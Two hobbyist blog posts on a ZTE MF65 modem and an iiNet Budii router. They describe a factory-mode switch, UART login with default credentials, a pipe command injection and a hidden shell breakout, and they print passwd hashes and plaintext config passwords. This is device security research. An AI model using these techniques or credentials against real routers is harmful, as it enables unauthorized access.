Wednesday, 17 May 2017

//////ZTE MF65 -- EFS acess method / partial Fs dump

In the last mf65 post
 we covered the local file listing method
 and briefly touched on the changes to the config file
 for constant file listing for the sd card functions

i managed to soft brick my device by directory transversal
on the sd card base path
basically the router would try and load the httpshare page,
get to the share path and sd base path,
ultimately just reading /mmc2/../
and it would just freak out and not load
so it sat around for a while.

Now im back and have a solution that,
 fixes my problem and gives us access to the internal files

we will need a windows machine (xp++)
 QPST, the modem drivers and
putty 

(ZTE WCDMA technologies MSM issue ??)
(if you cannot find the drivers keep looking they are around
try dcunlocker support files(i had to try several drivers before my machine acknowledged them))


using :
 
/goform/goform_process?goformId=MODE_SWITCH&switchCmd=FACTORY 

we get these devices
  • ZTE Diagnostics Interface (COMX)
  • ZTE NMEA Device (COMY)
  • ZTE Proprietary USB Modem 



 ((at this point if you do something stupid you may loose your router))))
 ***if you want to resume normal functions simply use****
(((AT+ZCDRUN=9+ZCDRUN=F ) on COMY)))

Now we load up QPST configuration and it will point at our modem,
if not fix the settings to point it at the correct com port,
then start the efs explorer,
you will be taken to the primary partion, 
in which there is not much of interest,
by clicking into the secondary partion 
we see the file system we saw with the local file exploit,
the files can be copied out by right clicking on the file and selecting to save the file to pc
this is also great for any modification
 you would like to make to either the webservice or the other files,
just ensure you make a back up of the files,
 as they cannot be restored.
(warning i have not tested the modem after any modification to see if the sim services are still functioning) 

you can dump the nvram out with the QPST tools as well.
we really havent gained much of a new hold except now we have a way to effectively alter the web file system and we have gained  copys of two parts of the memory + 100% copy of the ztemodem.iso and a few other files that where not available for the webserver to load .  

Stay tuned as we continue to look for roots!!


Tuesday, 16 May 2017

iiNet Budii(1031) Local File Listing (USBwebserver)

This is a method to list the local files on the router via wftp (USBwebsever) :
Requires login and usb inserted into the aux usbports(fat/nfts)(*1)
Either goto:
 
  
   Or 


To turn on the fileserver,
now point your browser here: 

  
(notice the URLencode because the straight transversal is rejected by the websever not even making its way to the app 
but with encoded slashes we beat the checks)


  and click save 

now we goto:


And we see our routers internal files.


we can wget out a copy of the systems memory with this enabled and scrape/view many of the files including the passwd file in the web browser:





fin.

iiNet Budii(1031) (UART based privesc attacks)

Opening the case we find a internal usb, we can also see a altera max jtag breakout, a large set of gpio pins and a UART breakout.

connecting to the uart and booting we can see the modem is running a broadcom firmware

 [bootlog.samp]
CFE version 1.0.38-112.118 for BCM96362 (32bit,SP,BE)
Build Date: Fri Dec 6 11:09:42 CST 2013 (root@Ayecom)
Copyright (C) 2000-2011 Broadcom Corporation.
 **
Chip ID: BCM6362B0, MIPS: 400MHz, DDR: 333MHz, Bus: 166MHz
 **
Total Memory: 134217728 bytes (128MB)
Default host run file name : vmlinux
Default host flash file name : bcm963xx_fs_kernel
[/bootlog.samp]

the user names available to us are:
(user:admin/password:admin)
(user:user/password:user)   

upon logging in we are brought into a console(d), the commands available to admin are :

[?.samp]
help           logout      exit       quit     reboot       adsl       
xdslctl           xtm      brctl      cat     loglevel       logdest
virtualserver  ddns      df    dumpcfg   dumpmdm   meminfo
psp   kill    dnsproxy    syslog    echo  ifconfig   ping
ps    pwd        sntp     sysinfo      tftp   voice
wlctl wifidefault arp defaultgateway  dhcpserver  dns
endbg dac3120_dbg cpld_led  lan  lanhosts   passwd  ppp
restoredefault  route save  swversion  cfgupdate  swupdate
exitOnIdle  wan  7sl  factoryrestore  factorywifi sysreport
 audiotest   usbinfo  zigbeetest  stopzigbee  initzigbee
[/?.samp]

The user account is slightly less privileged than the admin.

a quick cat of etc/passwd or var/passwd gives us:

[passwd]
admin:WjGFd46JWxdxE:0:0:Administrator:/:/bin/sh                                
support:tByR37W8BPs8g:0:0:Technical Support:/:/bin/sh                          
user:hfO9hSymQzRIQ:0:0:Normal User:/:/bin/sh                                   
nobody:FpbmJjv2tUjNk:0:0:nobody for ftp:/:/bin/sh                              
iiNetBoB:75xVKjjtU6y5A:0:0:Administrator:/:/bin/sh
[/passwd]

the passwords are all UN=PW expect for iinetbob.(pword unknown)

Ok so bobs pword is supposed to be super long and i don't have it so i need more access, to see the file system..

We use a pipe | on cat or ping really anything will work at this point just that cat is cleaner

so we use :\

>cat | ls -al

Because the second command is not bound to console(d) we can use all of
the busy box/sh/ash command set but after the command we are returned to the console(d)

by inserting a usb into the internal port we can simply cp out the files we need

>cat | cp "/dev/mtd0" "/dev/mtd1" "/dev/mtd2" "/dev/mtd3" > (your drive)

Looking into the console(d) routines and its links to {lib file:libcms_cli}
 we find a table of hiddencmds
 one of them more interesting than others:

# DATA XREF: .data:cliHiddenCmdTable o


>iinet@sh

this command breaks out of console(d) without killing the supervisors (smd&ssk)
we can always use the cat trick and break into sh but it sometimes fouls the smd control.

the command can be used in both the user account and the admin account so if in theory the routers admin was locked we could use the user account and privesc commands to gain a high level access.

We are still very limited as too how far we can swing inside the commands as the smd and ssk respond to alot of the actions placed across the userland  (telnet & ssh)

The config files can be dumped via  >dumpmdm or dumpconfig

which will also dump the users and passwords with no encoding/hashes


<SoftwareVersion>Budii1031</SoftwareVersion>
<AdditionalHardwareVersion>BoardId=GGDV711_iiNet</AdditionalHardwareVersion>   <X_BROADCOM_COM_LoginCfg>
<AdminUserName>admin</AdminUserName>
<AdminPassword>admin</AdminPassword>
<AdminPasswordHash>(null)</AdminPasswordHash>
<SupportUserName>support</SupportUserName>
<SupportPassword>support</SupportPassword>
<SupportPasswordHash>(null)</SupportPasswordHash>
<UserUserName>user</UserUserName>
<UserPassword>user</UserPassword>
<UserPasswordHash>(null)</UserPasswordHash>
<logintimeout>10</logintimeout>
</X_BROADCOM_COM_LoginCfg>


Till Next Time.